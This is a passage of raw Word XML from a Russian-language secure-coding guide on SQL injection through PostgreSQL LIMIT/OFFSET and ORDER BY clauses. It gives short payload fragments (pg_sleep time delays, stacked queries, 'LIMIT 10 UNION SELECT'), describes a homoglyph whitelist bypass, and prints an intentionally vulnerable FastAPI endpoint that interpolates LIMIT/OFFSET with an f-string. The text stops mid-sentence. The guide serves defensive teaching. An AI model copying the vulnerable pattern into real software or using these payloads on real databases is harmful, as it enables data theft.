    <w:p w14:paraId="0CCC89D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.4 (Time-based blind)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (CASE WHEN ... THEN pg_sleep(N) ELSE 1 END)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> создаёт conditional time delay в sorting phase. Граница та же — 3.4 описывает time-channel, 3.14.4 — точку входа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCFBFEA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 (Stacked queries)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.14.1 и 3.14.3 в драйверах с simple-protocol позволяют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0; SELECT pg_sleep(5)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через LIMIT. Граница: 3.5 описывает протокольную сторону (какие драйверы пропускают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>); 3.14 — конкретные clause-точки входа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46023532" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16 (Identifier injection в plpgsql)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.14.2 описывает ту же проблему (identifier нельзя bind через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) с точки зрения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>application-кода</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; 3.16 — с точки зрения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>серверного plpgsql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Граница: 3.14.2 — application-builder, 3.16 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE USING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри plpgsql.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBF9A0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.7 (Дополнительные приёмы валидации)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — раздел 5 содержит сводные шаблоны защиты (whitelist для ORDER BY, range-check для LIMIT); 3.14 — конкретные точки, к которым эти шаблоны применяются.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A85CB3A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Карта подразделов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D23622" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.14.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LIMIT/OFFSET integer-context — interpolated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f"LIMIT {n}"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, защита через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30736376" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.14.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ORDER BY column_name token — whitelist + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident()</w:t>
      </w:r>
      <w:r>
        <w:t>, обход через Unicode homoglyphs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BB66AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.14.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ORDER BY column_number — error-based leak select-list size, обход через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1; ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115EFFA0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.14.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ORDER BY (CASE WHEN ...) — full expression, row-order как boolean-channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04814B82" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Общая модель угроз</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3A7E69" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для всех четырёх подразделов 3.14 источник проблемы один: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>разработчик считает, что эти clauses "очевидно числовые" или "очевидно из whitelist"</w:t>
      </w:r>
      <w:r>
        <w:t>, и пропускает их через f-string / concat вместо bind-параметра или whitelist. PostgreSQL Wire Protocol устроен так, что bind-параметр (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) подставляется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только в expression-контекст</w:t>
      </w:r>
      <w:r>
        <w:t>, а LIMIT/OFFSET/ORDER BY имеют свои особые контексты:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32106739" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LIMIT/OFFSET принимают expression-контекст</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в PostgreSQL — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-параметры работают, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только если драйвер использует extended protocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только если параметр явно типизирован как integer</w:t>
      </w:r>
      <w:r>
        <w:t>. Многие SQL-builder-ы (custom Python helpers, старые версии Hibernate ≤ 4) собирают LIMIT через string concat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A54D0E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ORDER BY column_name принимает identifier-контекст</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-параметры </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не работают по протоколу</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (bind-параметр не может быть именем колонки). Это design, не bug. Единственный путь — whitelist + ручной quoting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DEBD34" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ORDER BY column_number принимает integer-контекст</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но это integer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>в select-list position semantic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — ошибки парсинга («column 99 does not exist») информативны и протекают в HTTP-response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160D4FD5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ORDER BY (expression)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это full SQL expression, и любой user-input в нём — полноценная SQL injection (но с особым каналом извлечения через row order).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BC4CFD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.14.1 LIMIT / OFFSET integer-context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE238A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Pagination через user-controlled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стандартный шаблон REST-эндпоинтов. PostgreSQL принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OFFSET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>expression-контекст</w:t>
      </w:r>
      <w:r>
        <w:t>, поэтому корректная защита — bind-параметр (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT :limit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Антипаттерн: разработчик считает, что «число — это безопасно», и собирает запрос через f-string или ручной concat. Когда LIMIT идёт в конец запроса, payload-у не нужно даже закрывать кавычки — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT 10 UNION SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сразу синтаксически валиден. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>самая популярная точка входа для UNION-инъекций в Postgres-приложениях</w:t>
      </w:r>
      <w:r>
        <w:t>, потому что LIMIT находится в конце SELECT-выражения, и payload не ломает остальной запрос.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA39DEE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EE8FB2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/articles.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480B9082"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7EB393D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3B2C98"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B2A915E"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0B17AE4D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268669B6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D922544" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAC5362" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/articles")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00079A7E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def list_articles(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBE769E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    limit: str = Query("10"),   # ← string из query-string, без типизации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD950A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    offset: str = Query("0"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF73809"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092D7B4D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DFFE22" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Антипаттерн: f-string в LIMIT/OFFSET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C252AEE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ECB85D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT id, title, published_at</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C69A1B4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM articles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6D28AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE status = 'published'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BDFD64" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY published_at DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AEB3ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT {limit} OFFSET {offset}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3979B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FE590A"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28AA9107"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328A7C75" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Разработчик «знает», что limit — число, но не валидирует его на уровне типа (использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не </w:t>
      </w:r>
